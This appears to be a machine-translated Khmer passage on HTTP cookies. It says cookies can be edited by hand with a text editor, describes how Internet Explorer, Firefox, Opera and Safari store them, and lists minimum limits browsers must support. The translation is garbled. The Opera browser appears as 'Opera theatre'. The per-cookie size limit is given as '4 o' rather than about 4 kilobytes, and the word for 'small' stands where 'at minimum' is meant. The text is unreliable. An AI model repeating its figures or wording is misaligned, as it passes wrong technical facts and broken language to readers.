ជាមួយនឹងកម្មវិធីរុករកមួយចំនួន ខូគីអាចកែសម្រួលបានយ៉ាងងាយស្រួល កម្មវិធីនិពន្ធអត្ថបទសាមញ្ញដូចជា Notepad គឺគ្រប់គ្រាន់ដើម្បីផ្លាស់ប្តូរតម្លៃរបស់វាដោយដៃ។

ខូគីត្រូវបានរក្សាទុកខុសគ្នាអាស្រ័យលើកម្មវិធីរុករក៖

• Microsoft Internet Explorer រក្សាទុកខូគីនីមួយៗនៅក្នុងឯកសារផ្សេងគ្នា;
• Mozilla Firefox រក្សាទុកខូគីទាំងអស់របស់វានៅក្នុងឯកសារតែមួយ;
• ល្ខោនអូប៉េរ៉ា រក្សាទុកខូគីទាំងអស់របស់វានៅក្នុងឯកសារតែមួយ ហើយអ៊ិនគ្រីបពួកវា (មិនអាចកែប្រែពួកវាបានទេ លើកលែងតែនៅក្នុងជម្រើសកម្មវិធី)។
• Apple Safari រក្សាទុកខូគីទាំងអស់របស់វានៅក្នុងឯកសារផ្នែកបន្ថែម .plist តែមួយ។ ការកែប្រែអាចធ្វើទៅបាន ប៉ុន្តែមិនងាយស្រួលទេ លុះត្រាតែអ្នកឆ្លងកាត់ជម្រើសកម្មវិធី។

កម្មវិធីរុករកត្រូវបានទាមទារដើម្បីគាំទ្រ តូច :

• 300 ខូគីក្នុងពេលដំណាលគ្នា;
• 4 o ក្នុងមួយខូគី;
• ខូគី 20 ក្នុងមួយម៉ាស៊ីន ឬដែន។